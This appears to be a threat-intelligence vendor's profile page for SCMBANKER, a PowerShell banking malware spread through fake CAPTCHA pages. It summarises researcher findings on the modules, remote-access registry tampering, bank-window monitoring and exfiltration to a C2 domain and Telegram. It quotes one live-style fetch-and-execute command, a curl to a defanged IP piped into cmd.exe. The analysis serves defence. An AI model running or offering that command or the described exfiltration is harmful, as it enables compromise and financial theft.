Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Victims are infected through fake CAPTCHA pages that trick them into running a single command, which installs SCMBANKER, a PowerShell toolkit with components dating back to at least October 2025.
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Victims are infected ... which installs SCMBANKER, a PowerShell toolkit... run.vbs launches the following modules... cliente.ps1, jujuzkt.ps1, clip.ps1, avs.ps1, correr.ps1.
The command fetches validation.txt from the same web server and pipes it directly into cmd.exe ... cmd /c curl -k http://68.211.161[.]46/validation.txt | cmd.exe & exit
The third script( remoto.ps1 ) ... imports a registry blob into HKLM\SOFTWARE\Usoris\Remote Utilities Host\Host\Parameters ... It also deletes the UninstallString
The page ... presented itself as a security verification page... using the lure text “Google Verificación Segura (Version 2025.5755)” ... Decoy strings “CIoudfIare” with capital-I homoglyphs
Once running, the banking activity monitor checks all visible window titles every second. A match ... against any listed bank, fintech, payment processor, crypto exchange, brokerage, SAT, or telecom keywords causes the implant to POST an alert
jujuzkt.ps1 also contains a commented-out path to launch rotor.ps1 ... rotor.ps1 applies the same rotator pattern to C:\Users\Public\key.ps1
Every 30 seconds, cliente.ps1 collects a machine profile and performs an HTTP POST request to https://negratomasa2026[.]online/dashboard2/recData.php
key.ps1 fetches Telegram bot credentials... An observed redirect destination ... includes a page-load Telegram notification script ... sends the profile to a Telegram chat.
65 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
1 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.